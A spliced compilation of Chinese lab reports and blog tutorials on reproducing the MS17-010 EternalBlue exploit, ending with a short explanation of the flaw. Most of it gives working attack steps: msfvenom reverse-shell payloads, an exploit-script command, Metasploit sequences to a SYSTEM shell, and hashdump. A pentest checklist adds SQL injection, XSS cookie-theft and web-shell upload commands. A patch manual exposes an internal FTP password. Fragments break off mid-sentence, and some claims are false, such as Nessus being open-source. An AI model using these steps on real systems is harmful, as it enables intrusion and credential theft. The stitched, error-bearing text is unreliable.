实验七 windows渗透测试-复现MS17-010漏洞
实验七-windows渗透测试-复现MS17-010漏洞
目录
实验七-windows渗透测试-复现MS17-010漏洞 (1)
7.1 实验目的 (2)
7.2 实验要求 (2)
7.3 实验步骤 (2)
7.3.1 环境设置 (2)
7.3.2 编译Sleepya开发的内核shellcode (5)
7.3.3 使用msfvenom生成一个反弹shellcode攻击的payload (6)
7.3.4 合并内核shellcode和payload (6)
7.3.5 设置监听 (6)
7.3.6 实施攻击 (7)
7.3.7 渗透成功后 (9)
7.4 思考题 (9)
7.1 实验目的
(1)尝试windows操作系统渗透
(2)了解windows漏洞的相关知识
(3)复现MS17-010漏洞
7.2 实验要求
(1)采用windows server 2012 r2(作为靶机)和kali(作为攻击机),利用MS17-010漏洞成功渗透测试靶机。
7.3 实验步骤
7.3.1 环境设置
首先请关闭防火墙,如图3-1所示操作:
先打开控制面板
图7-1 打开控制面板
然后依次选择系统和安全 -> Windows防火墙 -> 启用或关闭防火墙。
如图3-2关闭Windwos防火墙。
图7-2 关闭防火墙
本实验需要在Windows server 2012中启动Guest账号,具体操作如下图所示;
图7-3 打开管理工具
图7-4 打开本机安全策略
图7-5 本地策略-安全策略中找到账户:来宾账户状态
图7-6 启用来宾账户
7.3.2 编译Sleepya开发的内核shellcode
把附件中的eternalblue_x64_kshellcode.asm(Sleepya开发的内核shellcode)复制进去kali中;
然后如图3-7,使用NASM工具对asm代码编译,输入以下命令:
nasm -f bin eternalblue_x64_kshellcode.asm
图7-7 编译asm代码
7.3.3 使用msfvenom生成一个反弹shellcode攻击的payload
如图3-8所示,输入指令生成一个基于TCP的反弹shell,LHOST和LPORT 为本地ip和端口;
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o
meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.232.148 LPORT=9090
图7-8 反弹shellcode攻击的payload
7.3.4 合并内核shellcode和payload
如图3-9所示,输入指令:
cat eternalblue_x64_kshellcode meterpreter_msf.bin > metasploit_msf.bin
图7-9 合并内核shellcode和payload
7.3.5 设置监听
实施攻击之前,先去设置监听,在新的终端窗口中打开Metasploit(在终端输入msfconsole);
如图3-10所示,使用模块handler,设置payload为reverse_tcp,设置监听的Localhost的ip和端口,用来接受反弹的shellcode。
注:下方将LHOST设置为127.0.0.1
图7-10 设置监听
然后等待反弹shell。
(注:反弹成功后会出现如下划线文字)
图 7-11
7.3.6 实施攻击
将我们附件中的eternalblue_exploit8.py复制进kali中。
默认情况下,客户端帐户在Windows Server 2012 R2中处于禁用状态,但是,如果被管理员激活,那么可以利用它来获取目标中的SYSTEM shell。
第
一步是如图3-11所示修改eternalblue_exploit8.py,并指出它将是用于验证的那个帐户。
图7-12 设置USERNAME为Guest
然后重新打开一个新的终端,如图3-12所示,输入以下指令进行漏洞的利用:
python eternalblue_exploit8.py 192.168.42.133 metasploit_msf.bin 400
注:此处的ip地址为靶机ip地址
参数"500"的值对应于"numGroomConn",调整"numGroomConn"的数量有助于生成一个连续的内核内存地址池,以便覆盖我们需要的缓冲区,并且能够正确执行shellcode。
如果没有收到反弹的shell或者Windows server 2012出现蓝屏时,可以进一步增加或减少这个数值。
(可能需要多次的尝试)
图7-13 进行攻击
返回之前的msf,若是如图6-12所示,说明成功反弹shell。
图7-14 成功反弹shell
7.3.7 渗透成功后
如图3-14所示,输入sysinfo,输出靶机的系统信息
如图3-15所示,输入hashdump,获取用户密码的哈希值。
图7-15 输出靶机的系统信息和用户密码的哈希值7.4 思考题
(1)如何预防该漏洞?
永恒之蓝利用了445端口进行了攻击,我们关闭445端口即可,以下是详细步骤:
1.依次点击”开始“,”运行“,输入regedit,进入”注册表编辑器“。
2.接着,依次点击注册表选项”HKEY_LOCAL_MACHINE,SYSTEM,
CurrentControlSet,services,NetBT,Parameters“,进入NetBT这个服务的相关注册表项。
3.然后,在Parameters这个子项的右侧,点击鼠标右键,“新建”,
“QWORD(64位)值”,然后重命名为“SMBDeviceEnabled”,再把这个子键的值改为0,然后f5刷新退出就可以实现关闭端口了
(2)渗透的总过程是什么?
1.关闭目标靶机的防火墙
2.编译Sleepya开发的内核shellcode
3.使用msfvenom生成一个反弹shellcode攻击的payload
4.合并内核shellcode和payload
5.在攻击机上设置监听
6.实施攻击
7.攻击成功后对靶机进行控制。
MS17-010(勒索病毒)
谢谢大家
作系统用户遭受感染,校园网用户首当其冲,受害严重,大量实验室 数据和毕业设计被锁定加密。
我们该如何防范 永恒之蓝入侵你 的电脑呢?
微软声称如果用户采用全新版本的 Windows 10系统,并开启Windows Defender 的话,他们将会免疫这些勒索 病毒。也就是说Windows 10 用户大可放 心,将不会受到这个勒索病毒的传播。另 一斱面,失去安全更新支持的 Windows XP 和 Windows Vista 操作系统非常容易 遭受此类病毒的感染,微软建议用户尽早 更新至全新操作系统应对。 确保运行Windows操作系统的设备均安装 了全部补丁,并在部署时遵循了最佳实践。 此外,组织还应确保关闭所有外部可访问 的 主 机 上 的 S M B 端 口 (445,135,137,138,139端口,关闭网络 共享)。
WannaCry,一种电脑软 件勒索病毒。该恶意软件 会扫描电脑上的TCP 445
端口以类似于蠕虫病毒的
斱式传播,攻击主机并加 密主机上存储的文件,然
后要求以比特币的形式支
付赎金。
永恒之蓝的危害范围
2017年5月12日, WannaCry勒索病毒事件造成 99个国家遭受了攻击,其中 包括英国、美国、中国、俄罗 斯、西班牙和意大利。
永恒之蓝的危害范围
2017年5月14日,WannaCry 勒索病毒出现了变种:WannaCry 2.0,取消Kill Switch 将会使传播速度或更快。截止2017年5月15日, WannaCry造成至少有150个国家受到网络攻击,已经影响到金融,
能源,医疗等行业,造成严重的危机管理问题。中国部分Window操
漏洞复现实验报告(3篇)
第1篇一、实验背景随着互联网技术的飞速发展,网络安全问题日益凸显。
为了提高网络安全防护能力,及时发现和修复系统漏洞,本文将对近期发现的一个漏洞进行复现实验,分析漏洞的成因、影响及修复方法。
二、实验目的1. 了解漏洞复现的基本流程和步骤;2. 分析漏洞成因及影响;3. 掌握修复漏洞的方法和技巧;4. 提高网络安全防护能力。
三、实验环境1. 操作系统:Windows 102. 浏览器:Google Chrome3. 漏洞测试工具:Burp Suite4. 目标系统:某企业内部网站四、实验步骤1. 漏洞发现通过安全测试工具(如Fofa、Shodan等)或手动搜索,发现目标系统存在一个SQL注入漏洞。
2. 漏洞分析根据漏洞描述,该漏洞存在于目标系统的某个接口处,攻击者可以通过构造特定的SQL语句,对数据库进行未授权访问,从而获取敏感信息。
3. 漏洞复现(1)打开Burp Suite,配置代理设置为手动,将目标网站的域名添加到代理列表。
(2)在目标网站登录页面,输入用户名和密码,尝试登录。
(3)登录成功后,在Burp Suite的“Intercept”功能中,找到目标接口的请求,修改请求参数,构造SQL注入语句。
(4)发送请求,观察响应内容,分析漏洞是否复现。
4. 漏洞验证通过修改构造的SQL注入语句,验证漏洞是否确实存在,并分析漏洞的影响范围。
5. 漏洞修复(1)对目标系统进行安全审计,查找存在SQL注入漏洞的接口。
(2)修改相关代码,使用参数化查询或预编译语句,避免直接拼接SQL语句。
(3)对数据库进行权限管理,限制用户访问权限。
(4)对系统进行安全加固,提高系统安全性。
五、实验结果与分析1. 漏洞复现成功,攻击者可以获取目标系统数据库中的敏感信息。
2. 漏洞成因:开发者未对用户输入进行过滤和验证,直接拼接SQL语句,导致SQL注入漏洞。
3. 漏洞影响:攻击者可获取数据库中的敏感信息,如用户名、密码、身份证号等,存在信息泄露风险。
10.MS17-010的各种利用操作
10.MS17-010的各种利⽤操作⼀、Metasploit中的ms17-010:可以直接search查看,MSF之前的写过了就不再赘述了。
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution针对MS17010集成以下3个⼯具EternalRomance 永恒浪漫、EternalSynergy 永恒协作、EternalChampion 永恒之冠,来执⾏OS命令的辅助模块1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection扫描是否存在MS17010漏洞2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 针对别⼈已经安装好后门之后的利⽤模块3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption针对存在MS17010关于永恒之蓝x64的windows 2008R2/windows 7的利⽤模块4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+针对存在MS17010关于永恒之蓝的windows 8+的利⽤模块5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution针对MS17010集成以下3个⼯具EternalRomance 永恒浪漫、EternalSynergy 永恒协作、EternalChampion 永恒之冠,来获取shell的漏洞利⽤模块⼆、NSA原版ms17-010:1、原版ms17-010的下载和配置:原版的ms17-010胜在⽐较稳定,相⽐MSF那个更不容易蓝屏。
ms17-010-永恒之蓝漏洞利用教程
ms17-010-永恒之蓝漏洞利用教程(漏洞复现)实验环境:虚拟机:kali-linux windows 7 请自行下载安装1.打开虚拟机启动kali-linux 启动windows7(未装补丁)2.获取IP地址(ifconfig ipconfig)kali-linux :192.168.0.129windows7 :192.168.0.1303. kali-linux输入msfconsole启动msf(若不是root登陆需sudo 提升权限)root@bogon:~# msfconsole命令提示行显示msf则启动成功。
4. 使用永恒之蓝漏洞msf > use exploit/windows/smb/ms17_010_eternalblue5. 设定靶机IP 和操作机IP192.168.18.129为操作机kali-linux ip地址192.168.18.130为靶机windows 7 ip地址msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.1296. 设置TCP连接msf exploit (windows/smb/ms17_010_eternalblue)>set paylo ad windows/x64/meterpreter/reverse_tcp7.攻击msf exploit (windows/smb/ms17_010_eternalblue) > run测试:已成功获得windows管理员权限。
注意:虚拟机:windows XP 或者Win7 (未打永恒之蓝补丁,镜像msdn也可以下载)。
ms17-010永恒之蓝漏洞验证与利用
ms17-010永恒之蓝漏洞验证与利⽤如何发现永恒之蓝?利⽤漏洞之前,⾸先是要发现漏洞,那么我们在做测试的时候如何去发现漏洞呢?今天我给⼤家介绍⼀款开源免费的扫描⼯具Nessus。
Nessus号称是世界上最流⾏的漏洞扫描程序,通常包括成千上万的最新的漏洞,各种各样的扫描选项,及易于使⽤的图形界⾯和有效的报告。
在这⾥我们仅需要验证⼀台主机是否存在相印的漏洞即可。
下载地址:利⽤nessus发现永恒之蓝漏洞我在本地提前部署了未装任何安全杀毒软件、未进⾏过补丁升级的靶机作为测试环境。
以下为测试环境:Win7靶机:192.168.80.101Kali攻击机: 192.168.80.100Nessus:192.168.80.88下图为对靶机扫描的部分漏洞(摘取中⾼危漏洞)验证漏洞验证漏洞环节就需要我们⽤到kali攻击机⾥⾯的metaploit⼯具root@kali:~# msfconsole \\打开msfmsf5 > search MS17-010msf5 > use auxiliary/scanner/smb/smb_ms17_010msf5 auxiliary(scanner/smb/smb_ms17_010) > show optionsmsf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.80.101msf5 auxiliary(scanner/smb/smb_ms17_010) > show options \msf5 auxiliary(scanner/smb/smb_ms17_010) > run \\执⾏=====================以上验证了⽬标靶机存在永恒之蓝漏洞======================= msf5 > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > show optionsmsf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.80.101msf5 exploit(windows/smb/ms17_010_eternalblue) > run成功获取靶机的shellC:\Windows\system32>chcp 65001获取到shell之后就可以为所欲为啦,你就是这台机器的主⼈。
MS17-010漏洞补丁检查与安装手册
MS17-010漏洞补丁检查安装手册
一、安装对应表
二、补丁说明表
“x64”代表补丁适用于64位的操作系统
“x86”代表补丁适用于32位的操作系统
“chs”代表补丁适用于中文版本的操作系统(如果没有区分,默认为中文)
“enu”代表补丁适用于英文版本的操作系统
三、检查或验证步骤
首先检查补丁是否安装,如果已安装就不需要再执行步骤四安装。
1.Windows XP
打开“开始栏”并点击“控制面板”
点击“添加或者删除程序”
勾选“显示更新”
下拉检查对应安装的补丁是否已经安装
2.Windows 7/2008/2008R2
打开“开始栏”并点击“控制面板”
点击“程序”
点击“查看已安装更新”
下拉菜单检查对应的补丁是否已安装
四、下载安装参考步骤
1.登陆FTP
FTP主机:10.137.248.207 端口:21
用户名:wsusro
密码:Wsus@2017
2.找到对应的操作系统版本
3.找到对应的系统位数
4.找到对应语言的补丁并下载
5.下载完成后双击补丁运行
6.依次点击下一步直至完成退出
7.重启并验证补丁是否已安装成功(参考步骤三检查或者验证步骤)
五、更新系统补丁
1.点击“检查更新”
针对已检测出的补丁,点击“安装更新”,系统会自动进行补丁更新。
渗透测试项
检测日期序号测试项使用工具1 越权访问手工测试2 明文传输Burp SuiteSqlmap 测试可能被注入的参数‘or 1=1—‘or ‘1’=’1单个post :sqlmap.py -r “C:\Users\ZhangF\Desktop\测试工具\post.-p 参数 --dbs通过手工构造XSS代码测1) 存储型XSS2) 反射型XSS普通注入:<script>alert(document.cookie)</script>闭合标签注入:通过Burp Suite修改上传python ActiveMQExP.py -url http://192.168.18.133:8161/ -user admin -pass admin -shell D://shell.jsp(192.168.18.133:8161/admin查看)访问常用的地址链接console、admin、manager/html敏感信息包括但不仅限于1) 网站绝对路径2) SQL语句3) 中间件版本4) 程序异常等xxx.xxx.xx.xx:xxxx/examples/servlets/index.html:tomcat示例文件信息xxx.xxx.xx.xx:xxxx/’’:tomcat版本信息使用代码手工测试,命令1) 应用系统本身2) 框架(包括struts2、s2-016、s2-019、s2-037、s2-045漏洞等)3) 中间件(包括weblogic、Jboss等)java –jar WebLogic_cmd.jar -H x.x.x.x -P x –C whoami(“whoami”).xxx.xxx.xxx.xxx:xxxxx/wls-SQL 注入XSS 文件上传漏洞后台地址泄露敏感信息泄露命令执行漏洞3 4 5 67 8 Sqlmap 手工测试Burp Suite 手工测试手工测试手工测试利用其他用户账号访问非使用Burp Suite 在客户端与服务器之间的通信过程中抓包查看,是文传输用户口令。
kali渗透测试日记-通过Metasploit利用ms17-010永恒之蓝漏洞
kali渗透测试⽇记-通过Metasploit利⽤ms17-010永恒之蓝漏洞实战 - 利⽤ms17-010永恒之蓝漏洞扫描⽬标是否存在该漏洞search ms17-010找到其中的辅助扫描模块并载⼊use auxiliary/scanner/smb/smb_ms17_010 show options # 查看使⽤的参数选项可见需要RHOSTS参数(即远程主机的IP),这⾥假设为192.168.1.56set rhosts 192.168.1.56开始扫描run发现⽬标易受攻击,存在相关漏洞。
攻击模块加载与配置查找攻击模块(永恒之蓝)并加载search ms17-010use exploit/windows/smb/ms17_010_eternalblueshow options需要设置⽬标主机IP地址 RHOSTSset RHOSTS 192.168.1.56查看可以利⽤的⽬标主机类型show targets可以看到这个模块只有⼀个 target,所以默认就选择这个⽬标系统。
不需要⼿动设置。
search windows/x64/shell type:payload选择其中的第3个:反弹shell的payload。
加载:set payload windows/x64/shell/reverse_tcp查看payload需要配置的信息show options设置本机的监听地址LHOSTset LHOST 192.168.1.53配置完成,开始运⾏exploit(敲回车)等待反弹shell解决回显乱码问题在Win7的shell中利⽤chcp命令更改编码为65001即Unicode (UTF-8)chcp 65001保存会话在执⾏时,运⾏exploit -j-j 表⽰后台执⾏渗透⽬标完成后会创建⼀个 session 我们可以通过 session 连接⽬标主机。
查看sessions会话sessions通过id进⼊相应的sessionsessions -i [Id]保存到后台background结束会话sessons -k [Id]在获取会话后,如果没有回显,可以敲⼀下回车MSF攻击步骤1、查找 CVE 公布的漏洞2、查找对应的 exploit 模块3、配置模块参数4、添加 payload 后门5、执⾏ exploit 开始攻击。
MS17-010远程溢出漏洞(CVE-2017-0143)拿权限
MS17-010远程溢出漏洞(CVE-2017-0143)拿权限0x00我这边⽤的是安界⽹的靶场⾸先来开启靶场关于漏洞的介绍:MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在⼤⾮分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调⽤srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的⼤⼩,因计算⼤⼩错误,⽽导致缓冲区溢出。
0x01漏洞扫描⾸先我们来ping⼀下⽬标靶机可以看到是成功的在来看⼀下⽬标机开发的端⼝利⽤⼯具nmap命令如下nmap -sV -Pn 192.168.0.2⼀定要记住Linux需要区分⼤⼩写可以看到开放了 135 139 445 端⼝我们使⽤扫描模块看该漏洞是否可以利⽤命令如下msfconsole这边可以看到是可以利⽤的打开 metasploite 命令⾏客户端,使⽤search命令查找ms17-010漏洞的相关模块search ms17-010use auxiliary/scanner/smb/smb_ms17_010set RHOSTS 192.168.0.2然后直接run或者exploit 两个命令意思相同执⾏结果⼀样我这边是直接run0x02漏洞利⽤从上⼀步骤可以看出,该漏洞是可被利⽤的,接下来,我们使⽤漏洞利⽤模块use exploit/windows/smb/ms17_010_eternalblueshow options⽬标机host地址:192.168.0.2set RHOSTS 192.168.0.2之后,选择载荷payload,也就是shellcode,此处我们选择回连⾄控制端shell的payload配置中缺少本地主机 LHOST,设置⼀下set LHOST 192.168.0.3本地端⼝LPORT默认为4444,可通过set LPORT 端⼝号修改完成配置后,运⾏exploit或者run,开始执⾏漏洞利⽤模块0x04远程登录⽬标机我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能运⾏sysinfo查看⽬标机器相关信息sysinfo中⽂乱码问题不打紧不打紧执⾏help命令可以帮助我们了解meterpreter有哪些功能help接下来,我们获取⽬标机hash值执⾏hashdumphashdumpok了本次内容就到这⾥希望⼤家也去练习练习。
ms17_010_eternalblue 原理
ms17_010_eternalblue 原理
MS17-010(也称为EternalBlue)是一种远程执行代码(RCE)漏洞,影响微软Windows操作系统中SMBv1协议的实现。
SMBv1(Server Message Block version 1)是一种用于共享文件、打印机和其他网络资源的协议。
EternalBlue利用了SMBv1协议的一个漏洞,该漏洞允许攻击
者在受影响的系统上执行任意的远程代码。
攻击者可以通过向目标系统发送恶意的SMBv1请求来利用此漏洞。
此漏洞的利
用不需要目标系统上的任何用户交互。
具体而言,EternalBlue的原理如下:
1. 攻击者向目标系统发送一个特制的SMBv1请求,该请求包
含了一个缓冲区溢出漏洞,其中包含了恶意代码。
2. 目标系统接收到该请求并且解析其中的数据时,由于漏洞的存在,会导致缓冲区溢出。
3. 缓冲区溢出使得攻击者能够将恶意代码写入目标系统的内存中,并获得执行代码的控制权。
4. 攻击者利用控制权,可以执行任意代码,例如下载和安装恶意软件,窃取敏感数据,操控目标系统等。
EternalBlue漏洞在2017年被公开,被盗取的美国国家安全局(NSA)工具包中首次引入了这个漏洞。
由于该漏洞的严重
性和广泛的受影响范围,大约一年后,它被用于发起了WannaCry和NotPetya等全球性的勒索软件攻击。
微软随后发
布了安全补丁来修复此漏洞,并且强烈建议用户及时更新其系统。
